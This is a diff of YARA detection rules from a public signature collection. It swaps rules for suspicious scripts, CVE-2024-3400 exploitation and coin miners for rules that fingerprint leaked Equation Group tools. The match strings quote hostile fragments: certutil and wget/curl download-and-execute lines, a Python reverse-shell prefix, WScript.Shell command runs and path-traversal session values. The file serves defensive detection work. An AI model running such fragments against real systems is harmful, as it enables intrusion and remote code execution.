-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L70-L93"
+		id = "b0c42b06-8314-5731-b333-59bb90785cf4"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L952-L969"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5640dcfedc028cc40b0376d328758b504eb1ff860da94648b435eadb760d9724"
-		score = 40
+		logic_hash = "ae0b387725017de2766593ea55677dca36eee68107e0692a7d5e2526db74765b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash2 = "457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33"
 
 	strings:
-		$a1 = "certutil -decode " ascii wide
-		$a2 = "certutil  -decode " ascii wide
-		$a3 = "certutil.exe -decode " ascii wide
-		$a4 = "certutil.exe  -decode " ascii wide
-		$a5 = "certutil -urlcache -split -f http" ascii wide
-		$a6 = "certutil.exe -urlcache -split -f http" ascii wide
-		$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
+		$s1 = "header(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");" fullword ascii
+		$s2 = "if ($code =~ /proxyhost/) {" fullword ascii
+		$s3 = "\\$rk[1] = \\$rk[1] - 1;" ascii
+		$s4 = "#existsUser($u) or die \"User '$u' does not exist in database.\\n\";" fullword ascii
 
 	condition:
-		filesize < 700KB and 1 of ( $a* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Suspicious_JS_Script_Content : FILE
+rule SIGNATURE_BASE_Equationgroup__Magicjack_V1_1_0_0_Client : FILE
 {
 	meta:
-		description = "Detects suspicious statements in JavaScript files"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a547aa5-c58c-5559-9d3f-3f0d541eafd4"
-		date = "2017-12-02"
+		id = "be18f36c-3d6c-53a3-89b6-bfc53e1dd87d"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "Research on Leviathan https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L95-L112"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L971-L988"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1dbc1a266d710a70a77c81d5b872d0d324423250a9f34455faef53ac4c41b5f2"
-		score = 70
+		logic_hash = "5e22b01aa9b1283fa7a326b7c0f8047ed373fac750c89e9ba02c49f0f454e275"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
+		super_rule = 1
+		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
 
 	strings:
-		$x1 = "new ActiveXObject('WScript.Shell')).Run('cmd /c " ascii
-		$x2 = ".Run('regsvr32 /s /u /i:" ascii
-		$x3 = "new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" fullword ascii
-		$x4 = "args='/s /u /i:" ascii
+		$s1 = "temp = ((left >> 1) ^ right) & 0x55555555" fullword ascii
+		$s2 = "right ^= (temp <<  16) & 0xffffffff" fullword ascii
+		$s3 = "tempresult = \"\"" fullword ascii
+		$s4 = "num = self.bytes2long(data)" fullword ascii
 
 	condition:
-		( filesize < 10KB and 1 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 80KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Universal_Exploit_Strings : FILE
+rule SIGNATURE_BASE_Equationgroup__Ftshell : FILE
 {
 	meta:
-		description = "Detects a group of strings often used in exploit codes"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b3a9eec-5f7c-579c-9719-fe23cc291aee"
-		date = "2017-12-02"
+		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L114-L131"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L990-L1007"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6436a1cf6d0acc3162ec99c95ef20b3e6dd110c77d5a0b26ac790551316c0a69"
-		score = 50
+		logic_hash = "84c646b2c81f870f650fafd26471017b00b3b7020e72390f818304958e694572"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b07dacf8a45218ede6d64327c38478640ff17d0f1e525bd392c002e49fe3629"
+		super_rule = 1
+		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
+		hash4 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
 
 	strings:
-		$s1 = "Exploit" fullword ascii
-		$s2 = "Payload" fullword ascii
-		$s3 = "CVE-201" ascii
-		$s4 = "bindshell"
+		$s1 = "if { [string length $uRemoteUploadCommand]" fullword ascii
+		$s2 = "processUpload" fullword ascii
+		$s3 = "global dothisreallyquiet" fullword ascii
 
 	condition:
-		( filesize < 2KB and 3 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_VBS_Obfuscated_Mal_Feb18_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Store_Linux_I386_V_3_3_0 : FILE
 {
 	meta:
-		description = "Detects malicious obfuscated VBS observed in February 2018"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "39ea10e5-9dea-5cc8-8388-15378fcbab60"
-		date = "2018-02-12"
+		id = "b88be148-5308-583a-b41e-2bea9b837e2a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/zPsn83"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L133-L155"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1018-L1033"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bbd388a3103744df2434956c2b7ac12dacd72f9041b4cc014d31eec4115aedd"
+		logic_hash = "f284c2fecee23f01f83e0534d7d56a88b102e6dcc02a26321fe246604dc8cb0e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab"
-		hash2 = "c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036"
-		hash3 = "e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74"
+		hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc"
 
 	strings:
-		$x1 = "A( Array( (1* 2^1 )+" ascii
-		$x2 = ".addcode(A( Array(" ascii
-		$x3 = "false:AA.send:Execute(AA.responsetext):end" ascii
-		$x4 = "& A( Array(  (1* 2^1 )+" ascii
-		$s1 = ".SYSTEMTYPE:NEXT:IF (UCASE(" ascii
-		$s2 = "A = STR:next:end function" ascii
-		$s3 = "&WSCRIPT.SCRIPTFULLNAME&CHR" fullword ascii
+		$s1 = "[-] Failed to map file: %s" fullword ascii
+		$s2 = "[-] can not NULL terminate input data" fullword ascii
+		$s3 = "[!] Name has size of 0!" fullword ascii
 
 	condition:
-		filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_APT_UTA028_Forensicartefacts_Paloalto_CVE_2024_3400_Apr24_1 : SCRIPT CVE_2024_3400
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Genkey : FILE
 {
 	meta:
-		description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
-		author = "Florian Roth"
-		id = "32cf18ff-784d-5849-87f8-14ede7315188"
-		date = "2024-04-15"
-		modified = "2024-04-18"
-		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L2-L25"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fb305be7-9e16-502e-89ca-a40bb6890404"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1035-L1049"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1261eecca520daa0619859a45d2289d2c23c73be55e1a3849d2032a38e137f4d"
-		score = 70
+		logic_hash = "c1d823e297b0b1f47f12a3240d59f5ecc482f1140e5b2962f76ec2fff719664a"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2024-3400"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89"
 
 	strings:
-		$x1 = "cmd = base64.b64decode(rst.group"
-		$x2 = "f.write(\"/*\"+output+\"*/\")"
-		$x3 = "* * * * * root wget -qO- http://"
-		$x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"
-		$x5a = "failed to unmarshal session(../"
-		$x5b = "failed to unmarshal session(./../"
-		$x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
-		$x7 = "$(uname -a) > /var/" base64
+		$x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" fullword ascii
+		$x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" fullword ascii
 
 	condition:
-		1 of them
+		( filesize < 3KB and all of them )
 }
-rule SIGNATURE_BASE_EXPL_Paloalto_CVE_2024_3400_Apr24_1 : CVE_2024_3400
+rule SIGNATURE_BASE_Equationgroup_Cursetingle_2_0_1_2_Mswin32_V_2_0_1 : FILE
 {
 	meta:
-		description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
-		author = "Florian Roth"
-		id = "1bcf0415-5351-5e09-ab93-496e8dc47c92"
-		date = "2024-04-15"
-		modified = "2025-03-21"
-		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L27-L46"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7a1870ba-d600-5c11-8d3d-41395ad8be63"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1051-L1065"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ebc94a07b189a2d2dd252b5079fa494162739678fd2ca742e6877189a140da9"
-		score = 70
+		logic_hash = "bc27edc946beb5065d4fe43e53a33b448c24c7dd3eae0cedd4770c02fce7836b"
+		score = 75
 		quality = 85
-		tags = "CVE-2024-3400"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61"
 
 	strings:
-		$x1 = "SESSID=../../../../opt/panlogs/"
-		$x2 = "SESSID=./../../../../opt/panlogs/"
-		$sa1 = "SESSID=../../../../"
-		$sa2 = "SESSID=./../../../../"
-		$sb2 = "${IFS}"
+		$s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+		$s2 = "0123456789abcdefABCEDF:" fullword ascii
 
 	condition:
-		1 of ( $x* ) or ( 1 of ( $sa* ) and $sb2 )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_LNX_Base64_Download_Exec_Apr24 : SCRIPT
+rule SIGNATURE_BASE_Equationgroup_Cursesleepy_Mswin32_V_1_0_0 : FILE
 {
 	meta:
-		description = "Detects suspicious base64 encoded shell commands used for downloading and executing further stages"
-		author = "Paul Hager"
-		id = "df8dddef-3c49-500c-abc8-7f7de5aa69ae"
-		date = "2024-04-18"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L48-L65"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f60ff218-1cb7-5f44-a756-1ee67649e6a6"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1067-L1082"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "90b7781812b4078550b0d66ba020b3bb0a8217f2de03492af98db6c619f31929"
+		logic_hash = "0dcbf2b314ff9c392ae0cb4f14762dd20c6b85f7f547af683db3aea1c57dee57"
 		score = 75
 		quality = 85
-		tags = "SCRIPT"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352"
 
 	strings:
-		$sa1 = "curl http" base64
-		$sa2 = "wget http" base64
-		$sb1 = "chmod 777 " base64
-		$sb2 = "/tmp/" base64
+		$s1 = "A}%j,R" fullword ascii
+		$op1 = { a1 e0 43 41 00 8b 0d 34 44 41 00 6b c0 }
+		$op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 }
 
 	condition:
-		1 of ( $sa* ) and all of ( $sb* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_SUSP_PY_Import_Statement_Apr24_1
+rule SIGNATURE_BASE_Equationgroup_Cursehelper_Win2K_I686_V_2_2_0 : FILE
 {
 	meta:
-		description = "Detects suspicious Python import statement and socket usage often found in Python reverse shells"
-		author = "Florian Roth"
-		id = "8e05f9a1-40a8-5d01-9e45-8779b0ff7a45"
-		date = "2024-04-15"
-		modified = "2025-03-21"
-		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L67-L79"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1c24aa6a-74ab-5832-876b-5cab43dc6bb7"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1084-L1100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d5c199d9c3e449ca282f0ca91c94ac783709299b3489f7cec38177a2f843b504"
-		score = 65
+		logic_hash = "f6c92fc3540750a1223682b1672575b3a3120f5ebf63190a9b31d7e4e5ce13c7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1"
 
 	strings:
-		$x1 = "import sys,socket,os,pty;s=socket.socket("
+		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" fullword ascii
+		$op1 = { 8d b5 48 ff ff ff 89 34 24 e8 56 2a 00 00 c7 44 }
+		$op2 = { e9 a2 f2 ff ff ff 85 b4 fe ff ff 8b 95 a8 fe ff }
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_LNX_Base64_Exec_Apr24 : SCRIPT CVE_2024_3400 FILE
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Addkey : FILE
 {
 	meta:
-		description = "Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)"
-		author = "Christian Burkard"
-		id = "2da3d050-86b0-5903-97eb-c5f39ce4f3a3"
-		date = "2024-04-18"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L81-L105"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a025e379-c24e-56ac-b53c-bd38d51f3437"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1102-L1117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e96fb7c8faac12c1f0210689f2b3a7903b42a543b97ddff11298e5ae13cae80b"
+		logic_hash = "ec5b7499e3c3cc6b581c381ae61a4c987691c0d93dd589a5907fd7419335963a"
 		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2024-3400, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b"
 
 	strings:
-		$s1 = "curl http://" base64
-		$s2 = "wget http://" base64
-		$s3 = ";chmod 777 " base64
-		$mirai = "country="
-		$fp1 = "<html"
-		$fp2 = "<?xml"
+		$x1 = "print '  -s storebin  use storebin as the Store executable\\n'" fullword ascii
+		$x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" fullword ascii
+		$x3 = "print '  -k keyfile   the key text file to inject'" fullword ascii
 
 	condition:
-		filesize < 800KB and 1 of ( $s* ) and not $mirai and not 1 of ( $fp* )
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_EXT_EXPL_ZTH_LNK_EXPLOIT_A : FILE
+rule SIGNATURE_BASE_Equationgroup_Noclient_3_3_2 : FILE
 {
 	meta:
-		description = "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373."
-		author = "Peter Girnus"
-		id = "14788504-64e3-533b-ad21-00a3462a33cc"
-		date = "2025-03-18"
-		modified = "2025-03-29"
-		reference = "https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_lnk_zdi_can_25373.yar#L1-L23"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "be7c4263-e8e3-5a83-9003-063225e544ff"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1119-L1136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b2c6a7f0abd62d3eef916352f984d1fcc721cfba4f5de9d159de8fd428c02b31"
+		logic_hash = "14b1f135da81fd9a071e0f692bc7f1ab6f6f63d7dd05e1557e5c2d51135727b6"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72"
 
 	strings:
-		$spoof_a = {20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00}
-		$spoof_b = {09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00}
-		$spoof_c = {0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00}
-		$spoof_d = {0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00}
-		$spoof_e = {11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00}
-		$spoof_f = {12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00}
-		$spoof_g = {13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00}
-		$spoof_h = {0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00}
+		$x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii
+		$x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii
+		$x3 = "noclient: failed to execute %s: %s" fullword ascii
+		$x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
+		$s5 = "Attempting connection from 0.0.0.0:" ascii
 
 	condition:
-		uint32( 0 ) == 0x4C and uint32( 4 ) == 0x21401 and any of ( $spoof_* )
+		( filesize < 1000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Coinminer_Strings : SCRIPT HIGHVOL FILE
+rule SIGNATURE_BASE_Equationgroup_Curseflower_Mswin32_V_1_0_0 : FILE
 {
 	meta:
-		description = "Detects mining pool protocol string in Executable"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ac045f83-5f32-57a9-8011-99a2658a0e05"
-		date = "2018-01-04"
-		modified = "2021-10-26"
-		reference = "https://minergate.com/faq/what-pool-address"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L2-L18"
+		id = "4138f87a-4584-5efc-a168-633838893e2f"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1138-L1153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d63bf90560c83ab6c09e0c82b6a6449bca6e7e7d0945d3782c2fa9a726b2ca1"
-		score = 60
+		logic_hash = "e70954945b3a5e08e5ae216b16702056b403dbf14391276eae1ed13e8273c1ee"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, HIGHVOL, FILE"
-		nodeepdive = 1
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf"
 
 	strings:
-		$sa1 = "stratum+tcp://" ascii
-		$sa2 = "stratum+udp://" ascii
-		$sb1 = "\"normalHashing\": true,"
+		$s1 = "<pVt,<et(<st$<ct$<nt" fullword ascii
+		$op1 = { 6a 04 83 c0 08 6a 01 50 e8 10 34 00 00 83 c4 10 }
 
 	condition:
-		filesize < 3000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Coinhive_Javascript_Monerominer : HIGHVOL FILE
+rule SIGNATURE_BASE_Equationgroup_Tmpwatch : FILE
 {
 	meta:
-		description = "Detects CoinHive - JavaScript Crypto Miner"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f40c342-fcdc-5c73-a3cf-7b2ed438eaaf"
-		date = "2018-01-04"
+		id = "2c8cac7a-761f-59f4-bc04-285af4dbe184"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://coinhive.com/documentation/miner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L20-L33"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1155-L1169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4146b034a9785f1bb7c60db62db0e478d960f2ac9adb7c5b74b365186578ca47"
-		score = 50
+		logic_hash = "6fab5100f6ee0bf9a4e13e262c8d47e600f5aad64c7e04fe08fa42a5d78c38e8"
+		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
